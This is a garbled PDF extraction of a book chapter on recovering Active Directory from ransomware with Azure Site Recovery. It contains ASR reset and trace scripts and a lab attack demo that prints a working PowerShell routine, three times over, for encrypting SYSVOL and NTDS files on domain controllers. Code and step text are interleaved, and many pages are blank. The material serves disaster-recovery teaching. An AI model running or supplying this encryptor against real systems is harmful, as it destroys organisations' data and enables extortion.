Chapter 7 Recovering from Ransomware using Azure Site Recovery
If you think that this situation doesn’t happen, you are dead wrong. If you ask a room of IT
Professionals how many have been impacted by some type of Ransomware attack in the past 3
years most of them would put their hands up.
So, the short answer to the question “When can I get my data back is?” is as soon as we can.
Trust me the on this one point my friends that if you have an option of nothing or a recovery
point that is 24 or 48 hours old. The business will be extremely thankful that they have
something to keep going.
The pain staking process of rekeying data in a Ransomware Attack is something that you won’t
be able to overcome.
a. Active Directory
b. DNS
c. DHCP
You are talking about weeks if not months of downtime for some of these services if not all of
them.
155
Chapter 7 Recovering from Ransomware using Azure Site Recovery
5. The steps to perform Failover Now are easier and faster than a planned failover. First, you
choose the Virtual Machine from the Azure Recovery Vault.
8. Turn on the VM
The total amount of time to turn on an air gapped replica virtual machine is minutes.
156
Chapter 7 Recovering from Ransomware using Azure Site Recovery
should be testing their Recovery Points Quarterly. This is safe to do in an offline environment
and doesn’t take that long to complete
157
Chapter 7 Recovering from Ransomware using Azure Site Recovery
158
Chapter 7 Recovering from Ransomware using Azure Site Recovery
To resolve the issue I had to run a Reset Script on the host to wipe all the settings.
pushd .
try
{
$windowsIdentity=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$principal=new-object
System.Security.Principal.WindowsPrincipal($windowsIdentity)
$administrators=[System.Security.Principal.WindowsBuiltInRole]::Administrat
or
$isAdmin=$principal.IsInRole($administrators)
if (!$isAdmin)
{
"Please run the script as an administrator in elevated
mode."
$choice = Read-Host
return;
}
$error.Clear()
"This script will remove the old Azure Site Recovery Provider
related properties. Do you want to continue (Y/N) ?"
$choice = Read-Host
$serviceName = "dra"
$service = Get-Service -Name $serviceName
159
Chapter 7 Recovering from Ransomware using Azure Site Recovery
if (Test-Path $asrHivePath)
{
if (Test-Path $registrationPath)
{
"Removing registration related registry keys."
Remove-Item -Recurse -Path $registrationPath
}
if (Test-Path $proxySettingsPath)
{
"Removing proxy settings"
Remove-Item -Recurse -Path $proxySettingsPath
}
160
Chapter 7 Recovering from Ransomware using Azure Site Recovery
161
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Open an elevated PowerShell Window and then run the following commands to create your
trace definition:
Note: The default location specified above is C:\temp. You may safely change this value if
needed. The folder will be created if it does not exist.
Start the trace by typing the following command in the elevated Windows PowerShell window:
logman start ASRDebug
As soon as you reproduce your issue, stop the trace by typing the following command:
logman stop ASRDebug
Collect debug logs from the folder <installation folder>\Temp. The default location will be
C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.
162
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Note: This scenario takes place based on real-life events that took place 2 years ago. The client
in question had their Admin credentials compromised from an online cloud backup provider.
The attackers gained access to the backups and were able to crack the NTDS. Dit (Active
Directory Database) offline. Then at their leisure could they come in and out. They executed
this sophisticated attack on the customer’s busiest day of the year.
To showcase an attack like this, we are going to use PowerShell with Administrative privileges.
You will notice how none of Windows Defenders protection polices catch this.
We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain
controller. Second, we will take down Active Directory by encrypting the c:\Windows\NTDS
folder on each domain controller.
All of these steps were performed in a lab environment. Please do not try any of these steps in
production.
163
Chapter 7 Recovering from Ransomware using Azure Site Recovery
The code below is to only be used for testing purposes. DO Not run this in a production
environment. None of the authors of this book take any responsibility for your actions.
Windows Defender will not pick this attack up because it was executed with Administrative
Credentials. This means that in this case, you are now the victim of a Ransomware Attack.
#global variables
$csv = "C:\windows\temp\drives.csv"
Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C
ertificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography"
) }
Catch { Write-Error "Could not load required assembly."; Return }
$AesProvider = New-Object
System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object
System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted =
$KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
164
Chapter 7 Recovering from Ransomware using Azure Site Recovery
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)",
[System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object
System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object
System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open)
}
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination
$FilesToEncrypt.FullName -Force
}
Exit
165
Chapter 7 Recovering from Ransomware using Azure Site Recovery
1. Logon to DC01 as
Administrator
166
Chapter 7 Recovering from Ransomware using Azure Site Recovery
7. Then Grab the files from $FilesToEncrypt = Get-ChildItem -recurse -Force -Path
$FolderBrowser.SelectedPath | Where-Object {
the folder !($_.PSIsContainer -eq $true) } | % {$_.FullName} -
ErrorAction SilentlyContinue
$FilestoEncrypt
[Parameter(mandatory=$true)][System.Security.Cryptogr
aphy.X509Certificates.X509Certificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("Sy
stem.Security.Cryptography") }
Catch { Write-Error "Could not load required
assembly."; Return }
$AesProvider = New-Object
System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode =
[System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object
System.Security.Cryptography.RSAPKCS1KeyExchangeForma
tter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted =
$KeyFormatter.CreateKeyExchange($AesProvider.Key,
$AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey =
$KeyEncrypted.Length
$LenKey =
[System.BitConverter]::GetBytes($LKey)
167
Chapter 7 Recovering from Ransomware using Azure Site Recovery
[Int]$LIV =
$AesProvider.IV.Length
$LenIV =
[System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam
e)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file
for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0,
$LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform =
$AesProvider.CreateEncryptor()
$CryptoStream = New-Object
System.Security.Cryptography.CryptoStream($FileStream
Writer, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Writ
e)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes =
$AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[]
$BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object
System.IO.FileStream("$($FilesToEncrypt.FullName)",
[System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file
for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0,
$BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name)
-Destination $FilesToEncrypt.FullName -Force
}
169
Chapter 7 Recovering from Ransomware using Azure Site Recovery
170
Chapter 7 Recovering from Ransomware using Azure Site Recovery
1. Logon to DC01 as
Administrator
171
Chapter 7 Recovering from Ransomware using Azure Site Recovery
7. Then Grab the files from $FilesToEncrypt = Get-ChildItem -recurse -Force -Path
$FolderBrowser.SelectedPath | Where-Object {
the folder !($_.PSIsContainer -eq $true) } | % {$_.FullName} -
ErrorAction SilentlyContinue
172
Chapter 7 Recovering from Ransomware using Azure Site Recovery
$FilestoEncrypt
[Parameter(mandatory=$true)][System.Security.Cryptogr
aphy.X509Certificates.X509Certificate2]$Cert)
Try {
[System.Reflection.Assembly]::LoadWithPartialName("Sy
stem.Security.Cryptography") }
Catch { Write-Error "Could not load required
assembly."; Return }
$AesProvider = New-Object
System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode =
[System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object
System.Security.Cryptography.RSAPKCS1KeyExchangeForma
tter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted =
$KeyFormatter.CreateKeyExchange($AesProvider.Key,
$AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey =
$KeyEncrypted.Length
$LenKey =
[System.BitConverter]::GetBytes($LKey)
[Int]$LIV =
$AesProvider.IV.Length
$LenIV =
[System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object
System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam
e)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file
for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
173
Chapter 7 Recovering from Ransomware using Azure Site Recovery
$FileStreamWriter.Write($KeyEncrypted, 0,
$LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform =
$AesProvider.CreateEncryptor()
$CryptoStream = New-Object
System.Security.Cryptography.CryptoStream($FileStream
Writer, $Transform,
[System.Security.Cryptography.CryptoStreamMode]::Writ
e)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes =
$AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[]
$BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object
System.IO.FileStream("$($FilesToEncrypt.FullName)",
[System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file
for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0,
$BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name)
-Destination $FilesToEncrypt.FullName -Force
}
174
Chapter 7 Recovering from Ransomware using Azure Site Recovery
175
Chapter 7 Recovering from Ransomware using Azure Site Recovery
176
Chapter 7 Recovering from Ransomware using Azure Site Recovery
177
Chapter 7 Recovering from Ransomware using Azure Site Recovery
As you can see from the screenshot above that our replication is still running to Azure. Azure
Site Recovery doesn’t understand that anything bad has happened. Soon enough all of our DC’s
in our Recovery Vault will also have rolling blue screens.
178
Chapter 7 Recovering from Ransomware using Azure Site Recovery
179
Chapter 7 Recovering from Ransomware using Azure Site Recovery
180
Chapter 7 Recovering from Ransomware using Azure Site Recovery
181
Chapter 7 Recovering from Ransomware using Azure Site Recovery
182
Chapter 7 Recovering from Ransomware using Azure Site Recovery
11. We can also enable debug logman create trace ASRDebug -v mmddhhmm -o
C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -
logging to see what is y
logman update ASRDebug -p "Microsoft-Azure Site
happening. Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p
"MicrosoftAzureRecoveryServices" 0xC000000000000000
0x5
183
Chapter 7 Recovering from Ransomware using Azure Site Recovery
184
Chapter 7 Recovering from Ransomware using Azure Site Recovery
185
Chapter 7 Recovering from Ransomware using Azure Site Recovery
186
Chapter 7 Recovering from Ransomware using Azure Site Recovery
187
Chapter 8 Disaster Recovery items left forgotten
Chapter 8
188
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
Chapter 9
Live Presentations
Dave frequently speaks at Microsoft conferences around North America, such as TechEd,
VeeamOn, TechDays, and MVPDays Community Roadshow.
www.checkyourlogs.net
www.mvpdays.com
Video Training
For video-based training, see the following site:
www.mvpdays.com
189
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
www.truesec.com
www.checkyourlogs.net
Consulting Services
Dave and Cristal have worked with some of the largest companies in the world and had a wealth
of experience and expertise. Customer engagements are typically between two weeks and six
months.
190
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
191